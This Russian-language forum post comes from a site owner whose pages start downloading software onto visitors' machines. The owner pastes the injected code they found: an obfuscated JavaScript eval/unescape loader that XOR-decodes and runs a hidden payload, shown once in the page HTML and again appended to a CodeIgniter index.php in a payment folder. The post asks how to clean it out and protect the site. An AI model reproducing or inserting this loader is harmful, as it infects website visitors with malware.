кто ведает суть - объясните пожа в чем дело:
когда посетитель открывает страницу - начинает автоматом
устанавливаться какая то прога.
Firefox вообще пишет следующее при открытии сайта:
мол страница попала под подозрение = покинуть прямо сейчас/игнорировать/почему попала в список подозрительных (проверенно Гуглом)
решил посмотреть код странице - оказалось на каждой странице откуда то появилось
дополнение к коду:
</head> <body><!-- ad --><script>window['e>v>aElP'.replace(/[\*\>EP~]/g, '')](window['e>v>aElP'.replace(/[\*\>EP~]/g, '')]('uUnUeGsUcUaJpieU'.replace(/[iUJG&]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%48%47%50%61%6c%28%41%4c%41%54%49%29%7b%66%75%6e%63%74%69%6f%6e%20%48%6c%41%4c%61%47%28%4c%48%6c%54%29%7b%65%76%61%6c%28%22%76%61%72%20%4c%47%6c%4c%48%41%6c%70%3d%30%3b%22%29%3b%76%61%72%20%41%44%54%3d%4c%48%6c%54%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%41%41%61%44%68%54%3d%30%3b%22%29%3b%77%68%69%6c%65%28%41%41%61%44%68%54%3c%41%44%54%29%7b%4c%47%6c%4c%48%41%6c%70%2b%3d%50%4c%68%70%41%28%4c%48%6c%54%2c%41%41%61%44%68%54%29%2a%41%44%54%3b%41%41%61%44%68%54%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%4c%47%6c%4c%48%41%6c%70%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%50%4c%68%70%41%28%41%61%44%41%61%70%2c%41%49%44%29%7b%72%65%74%75%72%6e%20%41%61%44%41%61%70%2e%63%68%61%72%43%6f%64%65%41%74%28%41%49%44%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%48%61%61%3d%65%76%61%6c%28%27%61%4b%72%38%67%35%75%4b%6d%38%65%4b%6e%40%74%35%73%4b%2e%35%63%38%61%6b%6c%35%6c%40%65%40%65%35%27%2e%72%65%70%6c%61%63%65%28%2f%5b%40%6b%4b%35%38%5d%2f%67%2c%20%27%27%29%29%2c%4c%50%61%41%6c%70%41%3d%27%27%3b%76%61%72%20%50%41%41%47%3d%30%2c%48%49%48%44%3d%30%2c%41%49%48%49%48%50%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%48%61%61%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%4c%6c%61%49%47%68%3d%48%6c%41%4c%61%47%28%41%49%48%49%48%50%29%3b%65%76%61%6c%28%22%41%4c%41%54%49%3d%75%6e%65%73%63%61%70%65%28%41%4c%41%54%49%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%41%47%68%47%48%3d%30%3b%20%41%47%68%47%48%20%3c%20%28%41%4c%41%54%49%2e%6c%65%6e%67%74%68%29%3b%20%41%47%68%47%48%2b%2b%29%7b%76%61%72%20%41%49%6c%41%44%3d%50%4c%68%70%41%28%41%49%48%49%48%50%2c%50%41%41%47%29%5e%50%4c%68%70%41%28%4c%6c%61%49%47%68%2c%48%49%48%44%29%3b%76%61%72%20%50%41%61%49%61%49%3d%50%4c%68%70%41%28%41%4c%41%54%49%2c%41%47%68%47%48%29%3b%50%41%41%47%2b%2b%3b%48%49%48%44%2b%2b%3b%69%66%28%48%49%48%44%3e%4c%6c%61%49%47%68%2e%6c%65%6e%67%74%68%29%48%49%48%44%3d%30%3b%69%66%28%50%41%41%47%3e%41%49%48%49%48%50%2e%6c%65%6e%67%74%68%29%50%41%41%47%3d%30%3b%4c%50%61%41%6c%70%41%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%50%41%61%49%61%49%5e%41%49%6c%41%44%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%4c%50%61%41%6c%70%41%29%3b%20%72%65%74%75%72%6e%20%4c%50%61%41%6c%70%41%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%41%48%47%50%61%6c%28%27%25%33%33%25%33%30%25%33%31%25%33%33%25%33%33%25%33%38%25%33%32%25%33%34%25%36%31%25%33%33%25%31%36%25%33%35%25%31%33%25%32%66%25%33%65%25%35%36%25%31%63%25%37%64%25%35%61%25%32%64%25%33%30%25%32%66%25%32%39%25%36%63%25%32%30%25%32%64%25%30%66%25%30%39%25%37%63%25%31%66%25%34%32%25%33%36%25%31%30%25%31%64%25%30%39%25%30%31%25%30%32%25%33%62%25%33%33%25%37%63%25%33%63%25%33%63%25%33%36%25%32%37%25%33%38%25%31%31%25%31%39%25%31%31%25%31%65%25%31%66%25%33%31%25%32%63%25%37%30%25%35%65%25%37%35%25%32%62%25%31%36%25%30%35%25%30%36%25%31%39%25%31%66%25%37%66%25%37%64%25%32%36%25%37%63%25%33%62%25%37%33%25%32%37%25%33%65%25%33%39%25%36%63%25%35%31%25%33%61%25%32%38%25%33%33%25%32%32%25%37%62%25%35%36%25%35%63%25%32%32%25%32%64%25%33%35%25%30%31%25%37%32%25%32%35%25%33%36%25%33%38%25%33%32%25%33%34%25%36%66%25%31%31%25%33%66%25%35%61%25%32%66%25%30%32%25%31%34%25%30%36%25%30%63%25%32%64%25%30%30%25%33%39%25%35%33%25%31%33%25%30%36%25%33%39%25%32%65%25%34%33%25%37%37%25%37%62%25%32%66%25%35%65%25%30%63%25%31%65%25%32%30%25%32%37%25%36%63%25%33%35%25%30%30%25%33%38%25%31%37%25%32%65%25%31%33%25%31%63%25%35%65%25%34%37%25%33%36%25%31%62%25%33%35%25%30%31%25%33%33%25%34%30%25%36%36%25%37%37%25%37%30%25%35%63%25%37%61%25%37%65%25%31%32%25%35%61%25%32%63%25%31%31%25%30%65%25%33%34%25%31%38%25%33%37%25%32%34%25%32%64%25%33%66%25%32%35%25%33%38%25%33%65%25%37%33%25%34%39%25%30%35%25%30%65%25%33%38%25%32%65%25%31%37%25%31%62%25%33%63%25%30%32%25%32%35%25%33%37%25%33%32%25%33%61%25%35%65%25%35%61%25%34%63%25%36%39%25%36%61%25%35%34%25%32%39%25%36%63%25%32%63%25%31%37%25%32%36%25%33%64%25%30%37%25%32%31%25%30%32%25%37%34%25%33%31%25%32%63%25%32%36%25%32%34%25%35%33%25%37%61%25%33%38%25%30%30%25%31%62%25%32%33%25%31%38%25%30%65%25%35%30%25%36%30%25%36%30%25%37%64%25%35%66%25%36%39%25%36%32%25%31%64%25%33%64%25%33%31%25%32%38%25%32%39%25%33%30%25%30%32%25%32%36%25%35%35%25%32%31%25%36%34%25%33%30%25%37%34%25%36%39%25%31%65%25%31%64%25%37%62%25%33%30%25%31%34%25%33%39%25%33%30%25%32%34%25%36%65%25%32%62%25%32%66%25%33%35%25%36%61%25%37%62%25%33%30%25%37%32%25%32%65%25%33%64%25%36%30%25%31%38%25%31%30%25%33%64%25%35%39%25%33%33%25%32%66%25%36%64%25%33%33%25%33%34%25%30%34%25%30%62%25%33%38%25%33%66%25%33%33%25%31%63%25%32%36%25%30%64%25%32%39%25%35%65%25%32%31%25%37%32%25%37%65%25%30%62%25%30%61%25%33%36%25%31%64%25%37%38%25%35%38%25%35%62%25%33%64%25%31%38%25%32%30%25%33%37%25%33%38%25%30%33%25%33%34%25%31%38%25%33%34%25%35%33%25%31%31%25%35%32%25%34%63%25%37%35%25%33%32%25%35%35%25%37%62%25%34%62%25%34%39%25%35%30%25%35%38%25%32%30%25%32%30%25%36%35%25%32%66%25%31%35%25%31%35%25%31%38%25%32%66%25%31%33%25%35%33%25%36%39%25%37%61%25%32%31%27%29%3b'));</script><!-- /ad --><div style="visibility:hidden"></div>
обратился в службу поддержки хостинга reg.ru
там объяснили что троян на компе перед тем как загружал файлы на хост прописал
этот код.
удалил со всех страниц вредоносный код
очистил кэш,
проверил странице в норме,
захожу на страницы оплаты
(нажимая на кнопку оплатить прямо сейчас)
так же начинает загружаться что-то!
дальше решил проверить следующее:
открываю в папке "bbm" файл index.php :
<?php /* |--------------------------------------------------------------- | PHP ERROR REPORTING LEVEL |--------------------------------------------------------------- | | By default CI runs with error reporting set to ALL. For security | reasons you are encouraged to change this when your site goes live. | For more info visit: http://www.php.net/error_reporting | */ error_reporting(E_ALL); /* |--------------------------------------------------------------- | SYSTEM FOLDER NAME |--------------------------------------------------------------- | | This variable must contain the name of your "system" folder. | Include the path if the folder is not in the same directory | as this file. | | NO TRAILING SLASH! | */ $system_folder = "core"; /* |--------------------------------------------------------------- | APPLICATION FOLDER NAME |--------------------------------------------------------------- | | If you want this front controller to use a different "application" | folder then the default one you can set its name here. The folder | can also be renamed or relocated anywhere on your server. | For more info please see the user guide: | http://codeigniter.com/user_guide/general/managing_apps.html | | | NO TRAILING SLASH! | */ $application_folder = "app"; /* |=============================================================== | END OF USER CONFIGURABLE SETTINGS |=============================================================== */ /* |--------------------------------------------------------------- | SET THE SERVER PATH |--------------------------------------------------------------- | | Let's attempt to determine the full-server path to the "system" | folder in order to reduce the possibility of path problems. | Note: We only attempt this if the user hasn't specified a | full server path. | */ if (strpos($system_folder, '/') === FALSE) { if (function_exists('realpath') AND @realpath(dirname(__FILE__)) !== FALSE) { $system_folder = realpath(dirname(__FILE__)).'/'.$system_folder; } } else { // Swap directory separators to Unix style for consistency $system_folder = str_replace("\\", "/", $system_folder); } /* |--------------------------------------------------------------- | DEFINE APPLICATION CONSTANTS |--------------------------------------------------------------- | | EXT - The file extension. Typically ".php" | FCPATH - The full server path to THIS file | SELF - The name of THIS file (typically "index.php) | BASEPATH - The full server path to the "system" folder | APPPATH - The full server path to the "application" folder | */ define('EXT', '.'.pathinfo(__FILE__, PATHINFO_EXTENSION)); define('FCPATH', __FILE__); define('SELF', pathinfo(__FILE__, PATHINFO_BASENAME)); define('BASEPATH', $system_folder.'/'); if (is_dir($application_folder)) { define('APPPATH', $application_folder.'/'); } else { if ($application_folder == '') { $application_folder = 'application'; } define('APPPATH', BASEPATH.$application_folder.'/'); } /* |--------------------------------------------------------------- | LOAD THE FRONT CONTROLLER |--------------------------------------------------------------- | | And away we go... | */ require_once BASEPATH.'codeigniter/CodeIgniter'.EXT; /* End of file index.php */ /* Location: ./index.php *<html><body><!-- ad --><script>window['e>v>aElP'.replace(/[\*\>EP~]/g, '')](window['e>v>aElP'.replace(/[\*\>EP~]/g, '')]('uUnUeGsUcUaJpieU'.replace(/[iUJG&]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%48%47%50%61%6c%28%41%4c%41%54%49%29%7b%66%75%6e%63%74%69%6f%6e%20%48%6c%41%4c%61%47%28%4c%48%6c%54%29%7b%65%76%61%6c%28%22%76%61%72%20%4c%47%6c%4c%48%41%6c%70%3d%30%3b%22%29%3b%76%61%72%20%41%44%54%3d%4c%48%6c%54%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%41%41%61%44%68%54%3d%30%3b%22%29%3b%77%68%69%6c%65%28%41%41%61%44%68%54%3c%41%44%54%29%7b%4c%47%6c%4c%48%41%6c%70%2b%3d%50%4c%68%70%41%28%4c%48%6c%54%2c%41%41%61%44%68%54%29%2a%41%44%54%3b%41%41%61%44%68%54%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%4c%47%6c%4c%48%41%6c%70%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%50%4c%68%70%41%28%41%61%44%41%61%70%2c%41%49%44%29%7b%72%65%74%75%72%6e%20%41%61%44%41%61%70%2e%63%68%61%72%43%6f%64%65%41%74%28%41%49%44%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%48%61%61%3d%65%76%61%6c%28%27%61%4b%72%38%67%35%75%4b%6d%38%65%4b%6e%40%74%35%73%4b%2e%35%63%38%61%6b%6c%35%6c%40%65%40%65%35%27%2e%72%65%70%6c%61%63%65%28%2f%5b%40%6b%4b%35%38%5d%2f%67%2c%20%27%27%29%29%2c%4c%50%61%41%6c%70%41%3d%27%27%3b%76%61%72%20%50%41%41%47%3d%30%2c%48%49%48%44%3d%30%2c%41%49%48%49%48%50%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%48%61%61%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%4c%6c%61%49%47%68%3d%48%6c%41%4c%61%47%28%41%49%48%49%48%50%29%3b%65%76%61%6c%28%22%41%4c%41%54%49%3d%75%6e%65%73%63%61%70%65%28%41%4c%41%54%49%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%41%47%68%47%48%3d%30%3b%20%41%47%68%47%48%20%3c%20%28%41%4c%41%54%49%2e%6c%65%6e%67%74%68%29%3b%20%41%47%68%47%48%2b%2b%29%7b%76%61%72%20%41%49%6c%41%44%3d%50%4c%68%70%41%28%41%49%48%49%48%50%2c%50%41%41%47%29%5e%50%4c%68%70%41%28%4c%6c%61%49%47%68%2c%48%49%48%44%29%3b%76%61%72%20%50%41%61%49%61%49%3d%50%4c%68%70%41%28%41%4c%41%54%49%2c%41%47%68%47%48%29%3b%50%41%41%47%2b%2b%3b%48%49%48%44%2b%2b%3b%69%66%28%48%49%48%44%3e%4c%6c%61%49%47%68%2e%6c%65%6e%67%74%68%29%48%49%48%44%3d%30%3b%69%66%28%50%41%41%47%3e%41%49%48%49%48%50%2e%6c%65%6e%67%74%68%29%50%41%41%47%3d%30%3b%4c%50%61%41%6c%70%41%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%50%41%61%49%61%49%5e%41%49%6c%41%44%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%4c%50%61%41%6c%70%41%29%3b%20%72%65%74%75%72%6e%20%4c%50%61%41%6c%70%41%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%41%48%47%50%61%6c%28%27%25%33%33%25%33%30%25%33%31%25%33%33%25%33%33%25%33%38%25%33%32%25%33%34%25%36%31%25%33%33%25%31%36%25%33%35%25%31%33%25%32%66%25%33%65%25%35%36%25%31%63%25%37%64%25%35%61%25%32%64%25%33%30%25%32%66%25%32%39%25%36%63%25%32%30%25%32%64%25%30%66%25%30%39%25%37%63%25%31%66%25%34%32%25%33%36%25%31%30%25%31%64%25%30%39%25%30%31%25%30%32%25%33%62%25%33%33%25%37%63%25%33%63%25%33%63%25%33%36%25%32%37%25%33%38%25%31%31%25%31%39%25%31%31%25%31%65%25%31%66%25%33%31%25%32%63%25%37%30%25%35%65%25%37%35%25%32%62%25%31%36%25%30%35%25%30%36%25%31%39%25%31%66%25%37%66%25%37%64%25%32%36%25%37%63%25%33%62%25%37%33%25%32%37%25%33%65%25%33%39%25%36%63%25%35%31%25%33%61%25%32%38%25%33%33%25%32%32%25%37%62%25%35%36%25%35%63%25%32%32%25%32%64%25%33%35%25%30%31%25%37%32%25%32%35%25%33%36%25%33%38%25%33%32%25%33%34%25%36%66%25%31%31%25%33%66%25%35%61%25%32%66%25%30%32%25%31%34%25%30%36%25%30%63%25%32%64%25%30%30%25%33%39%25%35%33%25%31%33%25%30%36%25%33%39%25%32%65%25%34%33%25%37%37%25%37%62%25%32%66%25%35%65%25%30%63%25%31%65%25%32%30%25%32%37%25%36%63%25%33%35%25%30%30%25%33%38%25%31%37%25%32%65%25%31%33%25%31%63%25%35%65%25%34%37%25%33%36%25%31%62%25%33%35%25%30%31%25%33%33%25%34%30%25%36%36%25%37%37%25%37%30%25%35%63%25%37%61%25%37%65%25%31%32%25%35%61%25%32%63%25%31%31%25%30%65%25%33%34%25%31%38%25%33%37%25%32%34%25%32%64%25%33%66%25%32%35%25%33%38%25%33%65%25%37%33%25%34%39%25%30%35%25%30%65%25%33%38%25%32%65%25%31%37%25%31%62%25%33%63%25%30%32%25%32%35%25%33%37%25%33%32%25%33%61%25%35%65%25%35%61%25%34%63%25%36%39%25%36%61%25%35%34%25%32%39%25%36%63%25%32%63%25%31%37%25%32%36%25%33%64%25%30%37%25%32%31%25%30%32%25%37%34%25%33%31%25%32%63%25%32%36%25%32%34%25%35%33%25%37%61%25%33%38%25%30%30%25%31%62%25%32%33%25%31%38%25%30%65%25%35%30%25%36%30%25%36%30%25%37%64%25%35%66%25%36%39%25%36%32%25%31%64%25%33%64%25%33%31%25%32%38%25%32%39%25%33%30%25%30%32%25%32%36%25%35%35%25%32%31%25%36%34%25%33%30%25%37%34%25%36%39%25%31%65%25%31%64%25%37%62%25%33%30%25%31%34%25%33%39%25%33%30%25%32%34%25%36%65%25%32%62%25%32%66%25%33%35%25%36%61%25%37%62%25%33%30%25%37%32%25%32%65%25%33%64%25%36%30%25%31%38%25%31%30%25%33%64%25%35%39%25%33%33%25%32%66%25%36%64%25%33%33%25%33%34%25%30%34%25%30%62%25%33%38%25%33%66%25%33%33%25%31%63%25%32%36%25%30%64%25%32%39%25%35%65%25%32%31%25%37%32%25%37%65%25%30%62%25%30%61%25%33%36%25%31%64%25%37%38%25%35%38%25%35%62%25%33%64%25%31%38%25%32%30%25%33%37%25%33%38%25%30%33%25%33%34%25%31%38%25%33%34%25%35%33%25%31%31%25%35%32%25%34%63%25%37%35%25%33%32%25%35%35%25%37%62%25%34%62%25%34%39%25%35%30%25%35%38%25%32%30%25%32%30%25%36%35%25%32%66%25%31%35%25%31%35%25%31%38%25%32%66%25%31%33%25%35%33%25%36%39%25%37%61%25%32%31%27%29%3b'));</script><!-- /ad --></body></html>/<?php echo ''; ?><?php echo '<div style="visibility:hidden"></div>'; ?>
как этот код подчистить - чтобы не навредить работу скрипта оплаты уже не знаю.
и как себя обезопасить???
неужели это пробита бреж именно в скрипте оплату Бук Биз Мастер?